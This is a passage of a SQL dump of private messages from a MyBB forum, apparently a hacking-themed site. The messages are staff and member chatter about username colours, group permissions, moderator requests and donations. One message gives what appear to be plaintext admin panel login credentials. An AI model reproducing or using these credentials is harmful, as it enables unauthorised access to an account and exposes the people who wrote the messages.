`fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('700', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. ', '1345935578', '0', '3', '1345937958', '1', '0', '0', '1345937852'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('704', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: YT', '0', '[quote=\'t3h jok3r\'] There is a YT video advertisement thread in the OFF Topic forum, the OP has given you credits so can I grant them the award? [/quote] I guess', '1345937869', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('706', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)', '1345937958', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('707', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? ', '1345938277', '0', '3', '1345940173', '1', '0', '0', '1345939284'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('710', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that?', '1345940173', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('711', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. ', '1345940715', '0', '3', '1345941145', '1', '0', '0', '1345941068'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('713', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep', '1345941145', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('714', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" ', '1345941273', '0', '3', '1345941869', '1', '0', '0', '1345941699'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('718', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)', '1345941869', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('719', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. ', '1345941986', '0', '3', '1345995669', '1', '0', '0', '1345943215'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('728', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude', '0', 'It would be no e if you told me we where upgrading someone to mod....', '1345950749', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('730', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Access', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] I need your new info to access ACP. The secret pin is the same. [/quote] You mean my user and pass? [/quote] Yup, for the popup of the l33thacking.com:80 [/quote] poopipie sosecret32 ', '1345951029', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('741', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'ey', '0', 'Have you done my site yet?', '1345988482', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('745', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)', '1345995669', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('754', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] I will talk it out with my staff and let you know. ', '1346015059', '0', '1', '0', '1', '0', '0', '1346027746'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('758', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? [quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] [/quote]', '1346026363', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('760', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] Doesn\'t matter for me :p [/quote]', '1346027679', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('788', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'I understand I was just a little annoyed :3 when are you getting back? [quote=\'t3h jok3r\'] Nvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. [quote=\'Apathy\'] I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? [quote=\'t3h jok3r\'] Read the message below and do you think I should change the username color or not? [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon [/quote] We changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease. Thanks, we would highly appreciate your donation. [/quote] But the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why) [/quote] That\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to. True, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. Now the group is locked, you can moderate requests and more. Also would you like a custom forum? [/quote] Okay. About the custom forum, what about the Coding section thing, May i be a Mod of that? [/quote] I can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. We can make you a private coding forum for the Coders group, which you would be moderating. [/quote] Isnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep [/quote] I\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \" [/quote] Sorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :) [/quote] It\'s cool, good night. [/quote] Hey. Can you change the Coders color to the same as Elite as i will only accept Elite members :) [/quote] [/quote] [/quote] [/quote]', '1346092008', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('793', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] I dislike you. [/quote] Yea?', '1346099640', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('797', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Also', '0', 'Do to think I was serious? I was going to remove it.... Also the Fu was not serious either.', '1346099758', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('799', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'Your my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3 [quote=\'t3h jok3r\'] My flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA. I will be in USA around Sunday night. I understand how you 